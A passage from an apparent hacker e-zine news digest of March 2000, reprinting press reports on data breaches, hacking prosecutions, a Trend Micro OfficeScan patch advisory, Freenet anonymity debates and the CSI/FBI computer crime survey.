cool not to link to. Who would have ever thought of hacking an iMac into a rack-mount? Definitely a cool hardware hack. The iMac Rack-Mount Project http://imac.pointinspace.com/ (Surf to the URL homeboyie! pics and plans available for this kewl hack, someone found a use for the iMac?? - Ed) @HWA 71.0 HNS:Mar 24th:SECRETS STOLEN ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:57 PM British police said today they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. Link: Yahoo! http://dailynews.yahoo.com/h/nm/20000324/tc/britain_spies_1.html Friday March 24 10:18 AM ET British Intelligence Laptop Stolen at Station LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station. ``I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station),'' said a government official who declined to be identified. ``The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material.'' The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat. A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened. ``We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information,'' he said. Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. ``You can certainly say they've been tightened since this incident,'' he added. The Sun newspaper said a squad of 150 police were working around the clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result. The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas. @HWA 72.0 HNS:Mar 24th:PATCH RELEASED BY TREND MICRO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS (Help Net Security) http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:43 PM Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server(IIS). Link: Bugware http://www.net-security.org/cgi-bin/bugs/fullnews.cgi?newsid953916142,40085, Patch available for OfficeScan vulnerability Posted to BugTraq on March 24, 2000 Security Focus BugTraq ID: 1057 Posted: March 22, 2000 Summary ======= Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrator to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on thedesktops. Issues ====== Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components. If a malicious user, has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt and gain access to the OfficeScan management console. Implementation ============== Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use Windows NT file system (NTFS). After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as a administrator by NTFS security. This patch also prevents hackers, who sniffs for OfficeScan management console password over the network, from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication. Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.50 Trend OfficeScan Corporate Edition 3.51 Trend OfficeScan for Microsoft SBS 4.5 This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or Windows NT server without IIS. Patch Availability ================== OfficeScan Unauthenticated CGI Usage patch can be downloaded from: http://www.antivirus.com/download/ofce_patch.htm More Information ================ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_351.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Trend MicroTechnical Support is available at http://www.trend.com/support/default.htm Acknowledgements ================ Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers. @HWA 73.0 HNS:Mar 24th:PRIVACY ISSUES ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 5:32 PM The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. Link: FCW http://www.fcw.com/fcw/articles/2000/0320/web-dotgov-03-23-00.asp COMMENT Privacy, security on the Web require business know-how FCW's Dot-gov Thursday column BY Rich Kellet 03/23/2000 The idea that privacy and security might be symptoms and not the problem emerged from a recent Webmaster focus group discussion with the Office of Personnel Management on defining Webmaster classifications. We worked through the usual issues of defining technology Webmasters and content Webmasters. As we moved from the discussion of specialists to the issue of World Wide Web managers, an interesting perspective emerged from our discussions. Anecdotes and informal surveys are showing that about half of the Webmaster community works in mission-oriented program offices, which are not information technology organizations. This led to a discussion of the difference between managers in program organizations and managers in technology organizations. Web managers in program organizations tend to be business managers and Web managers in IT organizations tend to be technology managers. The conclusion of this discussion was to define a "breed" of Web manager under an IT series that is a technology manager or "Web technology manager" So, what about the concept of a classification for a Web business manager? I asked the group if anyone knew of a classification for business managers in the federal government. To my surprise, there does not appear to be one. It is important to pause at this point and consider what this means. Individuals who obtain business degrees, undergraduate or higher, have qualifications in an area recognized by the private sector as a unique skill and a profession in its own right. These skills are essential to running large programs that deliver the government’s products and services to the public or other agencies. When I developed the top skill areas that a federal Web manager needs so that the Webmaster can deliver programs online, to my own surprise, most of the required skills originated from business skills, such as accounting and financial management and budgeting. As I looked across government, I found surprisingly little information on what it means to run a business in the federal government context. There is plenty of information on, for instance, project management, but managing a project is not running a business. There is plenty of information on policy, but carrying out policy is not a running business. There is plenty on management, but management skills are not the only skills required to run a business. Courses in small business or college programs in business administration provide samples of the curriculums that define the skills needed to run a business. Running a business over the Web in government is about understanding, integrating and applying principles and processes related to leadership, culture, business processes and components, management, policy, and technology into a functioning organization that delivers a set of products and services to the public or other agencies. The issues of privacy and security are difficult to incorporate into Web sites because they challenge our abilities as business managers. Privacy and security are not "modules" you can buy off the shelf. It is not solely a technology issue, a people issue or a system issue. Privacy and security are "embedded and threaded" throughout the business processes, the organization’s working knowledge and the supporting technology infrastructure. At each level of the architecture and in the operations of the business, people and assets (routers, servers, operating systems and other components) Web masters must incorporate privacy and security concepts and solutions. To solve privacy and security requires a commitment to re-inventing business processes, developing the organization’s business and technology skills, and improving the underlying infrastructure. This is the stuff of a Web business manager. This is far beyond just "plugging holes" in operating systems or applications. Solving privacy and security is an enterprisewide issue that requires Web business leaders working with other business leaders in the agency. With the Web becoming the central construct for delivering products and services, the government is going to need Web business managers. We have many now, and we need to continue to grow this portion of the work force. So, where does that leave us? Not surprisingly, it is a business decision to decide whether to solve these issues by funding them appropriately, to develop business processes that incorporate privacy and security, and to build and continuously improve our organizational knowledge for putting in place privacy and security solutions. We can spend a lot of time on chasing privacy or security holes or solve the problem more efficiently and in less time by looking at the whole business. -- Kellet is founder of the Federal Web Business Council, co-chair of the Federal Webmaster Forum, and is director of GSA’s Emerging IT Policies Division. @HWA 74.0 HNS:Mar 24th:TARGETING ONLINE SCAMMERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:34 AM Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. Link: ZDNet http://mcafee.snap.com/main/page/pcp/cd/0,85,-1715-1085412-303380,00.html Authorities target online scammers By Margaret Kane, ZDNet News 03/23/2000 10:22 Law enforcement officials from 27 countries and 45 states have conducted a massive sweep of the Internet searching for "get-rich-quick" schemes and scams, the Federal Trade Commission said Thursday. More than 1,600 sites were uncovered in the "Get-Rich-Quick.con" program, one of several "surfs" the agency conducted looking for problems and crimes on the Net. The latest sweep hooked up law enforcement officials across state and national borders and involved hundreds of researchers who scoured the Net for scam artists. Many languages, one voice "We want them to know that the borderless Internet marketplace is not a free zone for fraud," said Jodie Bernstein, director of the FTC Bureau of Consumer Protection. "Though we speak different languages on the subject of Internet fraud, we speak with one voice. Our message is: Con artists will not threaten the safety of the Net." 'We're going to run them out of town, and run them off the Web'|Drew Edmondson, Oklahoma attorney general Some of the schemes promised users rewards such as "surf the Net and earn $100 an hour," he said. Authorities also found a variety of pyramid schemes, outrageous product claims and outright fraud. The sites are sent e-mail warnings, and documentation of the sites is provided to law enforcement agencies in the various jurisdictions, which will be able to further investigate and press charges, if necessary. Bernstein said the agencies could begin filing charges in June or July. Calling out the cyberposse "As an old prosecutor I'm looking forward to Phase Two. Once we've investigated, as the old sheriff would do, we're going to run them out of town and run them off the Web," said Drew Edmondson, Oklahoma attorney general. "And where appropriate we'll put them in jail." It came as no surprise to speakers at Thursday's news conference that con artists have migrated onto the Web. About half of the U.S. Postal Service's mail fraud investigations begin as online solicitations, said Lawrence Maxwell, USPS inspector in charge of fraud, prohibited mailings and forfeiture investigations. It's easy for con artists to target consumers "in an age dominated by a 'Who Wants to be a Millionaire' mentality," said Richard Walker, enforcement director for the Securities and Exchange Commission. @HWA 75.0 HNS:Mar 24th:FEARS OF FREENET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:30 AM A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news5.html Daily News Freenet Raises Security Fears By Martin Stone, Newsbytes March 24, 2000 A report by a British scientific magazine suggests that an anonymous Internet system designed to guarantee free speech online could be used by child pornographers, terrorists and others with less-than-pristine purposes. A Reuters report today said a New Scientist magazine article on the Freenet program, which was created by Edinburgh University graduate Ian Clarke and others to make tracing file originators impossible, thereby giving dissidents in countries without free speech a voice, could be misused by those with sinister designs. The report stated that the Internet Watch Foundation, an independent body monitoring Web sites in Britain, fears the decentralized system could make policing the Net and tracking down computer crimes even more difficult. "There is clear potential for misuse by criminals, terrorists and pedophiles," Roger Darlington, chairman of the foundation, told the weekly magazine in its latest issue, Reuters reported. Users of Freenet are difficult to track down because files do not contain a unique Web address and are distributed on computers belonging to Freenet members. To retrieve a file, users enter the key, Reuters said. According to Clarke, a single computer user cannot be held responsible for Freenet files because the originator cannot be traced. "It's perfect machine anarchy," he is quoted as saying. "No single computer is in control." Reported by Newsbytes.com @HWA 75.1 Anonymous net access aiding and abetting online criminals? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Dragos Ruii url: http://www.wired.com/news/technology/0,1282,34768,00.html Alternative Net Protects Pirates by Leander Kahney 3:00 a.m. 8.Mar.2000 PST Open-source advocates are developing an alternative publishing network that promises to provide true anonymity in sharing documents and files over the Internet. But in addition to protecting free speech, the new system also could be a boon for multimedia pirates. Freenet is an open-source file-transfer system similar to the Web for sharing digital content such as HTML pages and MP3 music files. It will be run by connected clusters of servers or node stations that could in turn be run on almost any PC connected to the Internet. But unlike the Web, Freenet has no centralized administrative infrastructure of domain name servers (DNS) and IP addresses that can be used to track users. Hosting and replicating documents and files requires that Freenet backers volunteer their time and resources. Because Freenet aims to be anonymous, secure, and without centralized control, it would make it almost impossible to trace people who post content -- legal or otherwise -- onto the network. "My primary motivation was to make it very difficult to censor information," said Ian Clarke, an Irish programmer who designed the system. "With the Internet there's the potential to censor and monitor people to a degree that's never been possible before. I wanted to develop the technology to make this impossible." Clarke started work on Freenet 18 months ago as a graduate student in artificial intelligence at Edinburgh University. He had been outraged by the Australian government's proposal to introduce sweeping censorship laws, which went into effect in January. Clarke hopes to launch the first public version in the spring, but he said the system is still pretty rough. The server is nearly finished, but so far there are no browsers, or clients, to make the network easy to use. Freenet software will be released under the GNU public license, which will allow anyone to freely distribute and change the source code. The system is being written in Java by about a dozen programmers internationally. They have never met nor even spoken over the phone -- all communication is by email, Clarke said. Both authors and readers can choose to be anonymous if they so wish, Clarke said. Like the Web, the network is navigated by a client, or browser. He said it will even be difficult to determine if someone is running a Freenet server and what information is being stored on it, Clarke said. Alex Fowler of the Electronic Frontier Foundation said that while he generally supports anti-censorship tools, Freenet could create as many problems as it solves. Fowler said that Freenet could be a useful tool in countries like Singapore or China that censor the Net or quash free speech. But he doesn't like the idea that you wouldn't be able to remove sensitive information -- such as someone's medical records. "There's no way to tell if a project like this will actually take off," he said. "It's certainly going to raise some questions with a whole lot of people. Not just copyright holders, but governments too." Patrick Ball, deputy director of the Science and Human Rights Program with the American Association for the Advancement for Science, said tools like anonymizers, strong cryptography, and Freenet tend not to help activists who are not already under surveillance because using them is in itself suspicious and tends to alert the authorities. "I'm for any application that protects dissidents," he said. "But there's a higher order problem that's very difficult to get around, and that's by using these tools you draw attention to yourself." Although Clarke designed Freenet to protect free speech, he thinks that the safeguards they are building in to make it difficult to track down those who distribute content could lead to its notoriety as a vehicle for copyright piracy. The system was designed to make it impossible to find out where files are physically stored. Information posted to the network is stored on multiple servers simultaneously, making it difficult to remove a file. In fact, Clarke said any attempt to remove information causes it to be copied to other servers on the network. The only way to remove information is to disable the entire network, which may prove difficult if it becomes popular and is running on thousands of PCs all over the globe. However, Clarke said the network cannot be guaranteed to permanently store information. Only popular files survive for any period of time. Older, unpopular files would be overwritten by more popular ones. "As a project we don't want to be labeled as hackers who distribute warez or copyrighted material," he said. "The purpose of Freenet is to promote freedom of information, but there is an inevitable consequence there that it might lead to violation of copyright law." "The potential for protecting freedom of speech is more important than protecting copyright, which is an economic tool," Clarke added. Clark noted that Freenet can be functionally identical to Napster, the wildly popular network for sharing music online. But while the Recording Industry Association of America is currently seeking a court order to shut down Napster's central servers, it would be almost impossible to disable a Freenet network running on machines all over the world. "Because it's decentralized no one can be held responsible for it," Clarke said. "Once it's released there's no point coming after me because there's nothing I, nor anyone else, can do to shut it down." Eric Sheirer, a music technology researcher at MIT's Media Lab, said Freenet is an interesting experiment, but said it would likely be used only by a small community of pirates and "privacy nuts." "If it is adopted, it will be adopted by people who want to exchange illegal information and by people who are rabid about privacy and security, which is a relatively small universe," Sheirer said. Sheirer pointed out that the Web is trustworthy because of the content on certain domains, and he likes the convenience of tracking devices such as cookies that remember log-in names and passwords. "Many of the advantages of Freenet are disadvantages to me," he said. Nonetheless, Sheirer said the advent of Freenet and Gnapster, an open-source clone of Napster, illustrated the need for debate about copyright laws in the age of ubiquitous digital distribution channels. "There are larger questions about the implications of these technologies," Sheirer said. @HWA 76.0 HNS:Mar 24th:FEDERAL CIO NEEDED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 11:29 AM Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Link: Computer Currents http://www.currents.net/newstoday/00/03/24/news16.html Federal CIO Needed for Web Security By Brian Krebs, Newsbytes March 24, 2000 Former Senate Year 2000 Committee Chairman Sen. Robert Bennett, R-Utah, said Thursday that the numerous legislative and agency efforts to address cyber security may need the guidance of a single "chief information officer" to coordinate the government's cross agency and trans-industry security measures. Speaking at a US Chamber of Commerce meeting, "Cyber Security: The Real Y2K Challenge," Bennett said that, while it is up to company CEOs to ensure the security of their own Web sites, the federal government can and should provide a overarching structure for that effort. Bennett said the Clinton administration's Critical Infrastructure Assurance Office (CIAO) - the agency charged with coordinating the federal government's cyber security efforts - was a good start, but also highlighted a need for leadership on the issue. "Every company has a chief information officer, and I think eventually the government would need its own CIO, maybe even at the cabinet level position," Bennett said. "But this is not going to happen quickly." Over the past few weeks, a handful of public officials have called for a federal government CIO to coordinate the government's many efforts. Last week before the House Subcommittee on Government Management, Information, and Technology, Chariman Stephen Horn, R-Calif., pointed to the government's many security management players and asked whether there shouldn't be one entity coordinating the government's efforts. "Y2K underscored the need for a disciplined management approach to problem solving," Horn said. "That type of commitment will be equally important as we turn to the second technological challenge of the New Year - computer security." Horn then turned to the witnesses, asking, "Could the Koskinen model work here?" At today's meeting, Bennett told reporters that, regardless of the model Congress ultimately chooses, he has heard from Koskinen himself on the issue. "He told me that with regard to the Critical Infrastructure Protection program: 'You have my very best wishes, but you will do it without me,'" Bennett said. Bennet said the responsibility for protecting the confidentiality and security of corporate information rests squarely on the shoulders of company CEOs, and those who wait for the government to step in with legislative remedies will find their sites hacked and their business secrets revealed. "This is a CEO and survival issue, not something you leave to the techies," he said. "The reality is that if somebody decides they want to break into your company and steal your secrets, they can do that." Bennett urged CEOs in attendance to shift to the mode of urgency and cooperation that made Y2K such a non-event, and emphasized the need for lawmakers and CEOs to take a "horizontal" view of their organization and how weaknesses in their companies' systems can affect other companies on the network. "We're not thinking horizontally enough in Congress and industry," Bennett said. "Nobody's interested in stovepiping: I don't care if your company is secure or not, but I do care if you're connected to the Internet." Bennett said that, given the hectic schedule that Congress is working at this session, it was likely that few of the many proposed bills to address cyber security would pass this year. But, he said, the bills were necessary to keep the dialogue going. Reported by Newsbytes.com, http://www.newsbytes.com . (20000323/WIRES ONLINE, LEGAL, BUSINESS/) (NEWS)(ASIA)(HKG)(00029) Arescom Provides DSL For Chunghwa Telecom 03/23/00 HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily. Broadband provider Arescom has recently been awarded a major business contract for 78,000 digital subscriber lines (DSL) in partnership with one of Taiwan's wireless service providers, Tecom. The contract includes the supply and installation of Arescom's NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the NetDSL 1000 IP (Internet Protocol) router. Implementation is expected to start in May and Arescom is partnering with Nokia for DSLAM products. NetDSL 1000 can support up to 253 users through a hub. It has router capabilities already built in. The NetDSL 800 ADSL modem provides Internet access and bridging functions through Ethernet and USB (Universal Serial Bus) interfaces. Reported by Newsbytes.com @HWA 77.0 HNS:Mar 24th:DETERRENT SENTENCES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 24 March 2000 on 1:45 AM Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. Link: SCMP http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp Wednesday, March 22, 2000 Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kind of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 8:32 PM Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. Link: Security Watch http://www.securitywatch.com/scripts/news/list.asp?AID=2324 Insurance site exposes sensitive customers' data (03/23/2000) Consumers who requested online life insurance quotes from the SelectQuote Web site on Tuesday and Wednesday were apparently victimized by a software glitch, which caused their personal information to be left on the company's Web site, wide open. The security glitch in the softwareSelectQuote uses, would have occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This resulted in all personal information (name, address, current coverage and parents' health histories) from the previous user being plainly exposed to the next person requesting a quote. @HWA 79.0 HNS:Mar 23rd:ALTERING WEB SITES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:32 PM A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites and defaced it. Link: The Press NZ http://www.press.co.nz/2000/12/000323x04.htm Hacker breaches security to alter Alexandra website text By Sonia Gerken A Gore computer business has beefed up its security after a Brazilian hacker got into one of the websites it manages and changed the text. Clive Wilson Computers Gore managing director Ewen Whitefield said yesterday the security breach of its domain hosting machine last month was low level, but "anyone hacking into our machines is serious." The hacker changed text on the website of an Alexandra client. Police had been notified of the breach and the company was unlikely to pursue it further. "It annoys us more than anything else. If it was a major security breach we could chase it back to the United States and Brazil," Mr Whitefield said. If anything the breach proved the company's electronic "firewalls" were pretty good, stopping the hacker from getting any further than minimal damage, he said. Website designer Ken France, of Arthurton, said the hacker probably found a "tiny little hole" to sneak in through. It was an old site, designed two years ago. The breach was annoying and nothing serious - "apart from getting a laugh at our expense," he said. There was a big rush of "hits" to the site after the first hacker got in. Within a week 200 hits more than usual were logged and three or four of those had changed some text, Mr France said. "Some even put their telephone number in. "It was like 'If you want to know how I got in here give me a call'," he said. The company was warned about the hacking by a phone call from someone claiming to be a website watcher in Australia. Mr France said the call came an hour after he had looked at the website and it was all right. "It's quite strange how they knew. I suspect it was bogus." Mr Whitefield said the company received an e-mail the day after the hacking from the Brazilian Internet Society asking questions about the hacker. There was no way to verify the authenticity of the e-mail, he said. Mr France said the company's tighter security had been affective. At times he had been unable to get into sites he designed that were managed by the company. "It's good in a way. If I can't get in, how will anyone else," he said. @HWA 80.0 HNS:Mar 23rd:SECURITY BREACHES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 5:28 PM More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey. Link: APB News http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html 9 of 10 Companies Report Computer Attacks Survey Finds Damages Triple as Cybercrime Booms March 22, 2000 By David Noack SAN FRANCISCO (APBnews.com) -- More than 90 percent of large corporations and government agencies were the victims of computer security breaches in 1999, according to a new survey. The Computer Security Institute's fifth Computer Crime and Security Survey also found that the total reported financial losses have tripled. The annual survey is conducted with the participation of the San Francisco FBI Computer Intrusion Squad and aims to increase awareness of security. This year's survey was based on responses from 643 computer-security professionals in U.S. corporations, government agencies, financial institutions, medical institutions and universities. Only 42 percent of those answering the survey could put a dollar figure on their financial losses -- reporting the total at $265 million. The average annual total over the last three years was $120 million. Widespread and diverse Patrice Rapalus, director of the Computer Security Institute, said the survey points to a disturbing trend. "Cybercrimes and other information-security breaches are widespread and diverse," she said. "Ninety percent of respondents reported attacks. Furthermore, such incidents can result in serious damages. ... Clearly, more must be done in terms of adherence to sound practices, deployment of sophisticated technologies, and most importantly, adequate staffing and training of information-security practitioners in both the private sector and government." The survey also found: 70 percent reported a variety of serious computer security breaches other than the most common ones of computer viruses, laptop theft or employee "net abuse." Other examples included theft of proprietary information, financial fraud, system penetration from outsiders, denial of service attacks and sabotage of data or networks. 74 percent acknowledged financial losses due to computer breaches. 71 percent of respondents detected unauthorized access by insiders. For the third year in a row, more respondents -- 59 percent -- cited their Internet connection as a frequent point of attack rather than their internal systems -- 38 percent -- as a frequent point of attack. Financial losses larger The report said the financial losses in eight of 12 categories were larger than in any previous year. In addition, financial losses in four categories were higher than the combined total of the three previous years. For example, 61 respondents quantified losses due to sabotage of data or networks for a total of $27 million. The total financial losses due to sabotage for the previous years combined totaled only $10 million. As in previous years, the most serious financial losses occurred through theft of proprietary information, with 66 respondents reporting losses of $66 million and financial fraud and 53 reporting $55 million in losses. The survey results show that computer crime threats to large corporations and government agencies come from both inside and outside their electronic perimeters, confirming trends found in prior surveys. Bruce J. Gephardt heads the FBI's Northern California office in San Francisco, which covers 15 counties, including Silicon Valley. He said the survey helps him decide how to deploy his forces instead of reacting to computer crises as they occur. Trends and crises "The results of the CSI/FBI survey provide us with valuable data," Gephardt said. "This information not only has been shared with Congress to underscore the need for additional investigative resources on a national level, but [it] identifies emerging crime trends and helps me decide how best to proactively and aggressively assign resources before those 'trends' become 'crises.'" CSI, which was established in 1974, is a San Francisco-based association of information-security professionals. The FBI, responding to an increase in the criminal targeting of major components of information and economic infrastructure systems, has established the National Infrastructure Protection Center (NIPC), which is located at FBI headquarters, and the Regional Computer Intrusion Squads, which are located in selected offices throughout the United States. The NIPC, a joint partnership among federal agencies and private industry, is designed to serve as the government's lead mechanism for preventing and responding to cyberattacks on the nation's infrastructure. The Regional Computer Intrusion Squads investigate violations of the Computer Fraud and Abuse Act, which includes intrusions to public switched networks, major computer network intrusions, privacy violations, industrial espionage, pirated computer software and other crimes. David Noack is an APBnews.com staff writer (david.noack@apbnews.com). @HWA 81.0 HNS:Mar 23rd:ATTACK COSTS RISE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 23 March 2000 on 3:29 PM In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to up to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach. Link: CNNfn http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/ Hacker attack costs rise FBI, CSI: Verifiable losses due to poor security top $265M in 1999 March 22, 2000: 7:30 a.m. ET SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best known sites seriously hit by hacker attacks, few computer users would question that cyber-security is a pressing concern. In an annual survey issued on Wednesday, the FBI and the San Francisco-based Computer Security Institute showed just how pressing: total verifiable losses in 1999 more than doubled to up to top $265 million, while more than 90 percent of respondents reported detecting some form of security breach. Security experts say a large number of attacks go unrecognized, and the total is hard to assess, with companies reluctant to admit they've been vandalized. But the annual survey gives a clear picture of a worsening problem. "The trends are continuing in the same direction. It's going from bad to worse in terms of threats from the outside, while the threat from the inside doesn't go away," said Richard Power, CSI's editorial director. The fifth annual survey of computer crime and security polled some 640 corporations, banks and government organizations about the state of their computer systems. Only 42 percent of these respondents could put a dollar figure on what the attacks cost them -- but this figure, at $265 million, was more than double the average annual total over the last three years. While the most common threats -- computer viruses, laptop theft, or employee "net abuse" -- continued apace, at least 74 percent of respondents reported more serious security breaches including theft of proprietary information, financial fraud, system penetration by outsiders, data or network sabotage, or "denial of service" attacks designed to take websites out of commission. Information theft and financial fraud caused the most severe financial losses, put at $68 million and $56 million respectively. But "denial of service" attacks, like the ones that temporarily paralyzed Yahoo!, eBay, Buy.com, and several other websites in February, are also a growing problem, Powers said. Losses traced to denial of service attacks were only $77,000 in 1998, and by 1999 had risen to just $116,250. The new survey, which reports on numbers taken before the high-profile February strikes, showed quantified losses up at more than $8.2 million. "The denial of service showed that many sites are way, way understaffed and not adequately secured," Powers said. "Maybe a half a dozen sites were attacked in that attack, and 150 sites were hacked into to launch the attack. There is a widespread insecurity among corporate sites and government sites and the problem is not just technological, it is human. There are not enough people working on it." Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern California office, said the survey revealed how quickly computer security is becoming a major problem faced by law enforcement, and how more staff was needed to fight it. "If the FBI and other law enforcement agencies are to be successful in combating this continually increasing problem, we cannot always be placed in a reactive mode, responding to computer crises as they happen," Gephardt said in a news release. @HWA 82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 23 March 2000 on 3:28 PM A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Link: Miami Herald http://www.herald.com/content/today/business/brkdocs/079991.htm Posted at 11:58 p.m. EST Wednesday, March 22, 2000 Man indicted after allegedly hacking into government computers SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was 